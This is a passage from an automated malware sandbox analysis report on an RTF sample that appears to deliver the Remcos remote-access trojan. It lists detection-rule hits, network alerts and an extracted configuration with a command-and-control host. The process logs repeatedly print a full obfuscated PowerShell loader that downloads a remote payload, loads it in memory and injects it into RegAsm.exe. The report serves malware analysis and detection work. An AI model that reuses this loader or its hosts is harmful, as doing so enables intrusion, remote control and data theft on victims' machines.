'+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11b
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3288, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" , ProcessId: 3444, ProcessName: wscript.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3288, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" , ProcessId: 3444, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11b
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ptdercjwijh", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ptdercjwijh", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3728, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ptdercjwijh", ProcessId: 3876, ProcessName: RegAsm.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3288, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" , ProcessId: 3444, ProcessName: wscript.exe
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3288, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11b
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3208, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\Temp\ccmujxud.fha.ps1

              Stealing of Sensitive Information

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: CF E4 1F DA B9 6D B0 83 F8 32 55 B5 EA B0 41 83 FD 9A 94 BF 82 77 23 AE 81 BC 58 EF 80 D5 AD A4 6E BB 9D 3B 1B 27 AA 8C E2 CF 54 0A A5 36 FC 15 75 C2 5C 34 DB 34 C5 44 3D 8A 64 31 44 36 3B 5E D7 2D D1 0A 32 92 00 51 C6 D5 BD 27 5A 81 59 3D 1E DE A1 1F 81 7F A3 C4 7C D3 69 01 1D 56 D0 33 3B 8F 50 5D 84 AF 3D D7 F9 AB F6 B7 9F D6 39 7B 16 E6 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3728, TargetObject: HKEY_CURRENT_USER\Software\Rmc-43JG4A\exepath
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-05T14:58:24.631736+020020204231Exploit Kit Activity Detected51.83.251.11380192.168.2.2249167TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-05T14:58:24.631736+020020204241Exploit Kit Activity Detected51.83.251.11380192.168.2.2249167TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-05T14:58:27.438823+020020365941Malware Command and Control Activity Detected192.168.2.224916884.32.44.1391991TCP
              2024-10-05T14:58:28.694665+020020365941Malware Command and Control Activity Detected192.168.2.224916984.32.44.1391991TCP
              2024-10-05T14:58:28.741873+020020365941Malware Command and Control Activity Detected192.168.2.224917084.32.44.1391991TCP
              2024-10-05T14:58:28.865339+020020365941Malware Command and Control Activity Detected192.168.2.224917184.32.44.1391991TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-05T14:58:28.812993+020028033043Unknown Traffic192.168.2.2249172178.237.33.5080TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: MKWbWHd5Ni.rtfAvira: detected
              Source: 00000009.00000002.886651440.00000000008F1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "cavps7.duckdns.org:1991:1", "Assigned name": "Agent-010524", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-43JG4A", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", 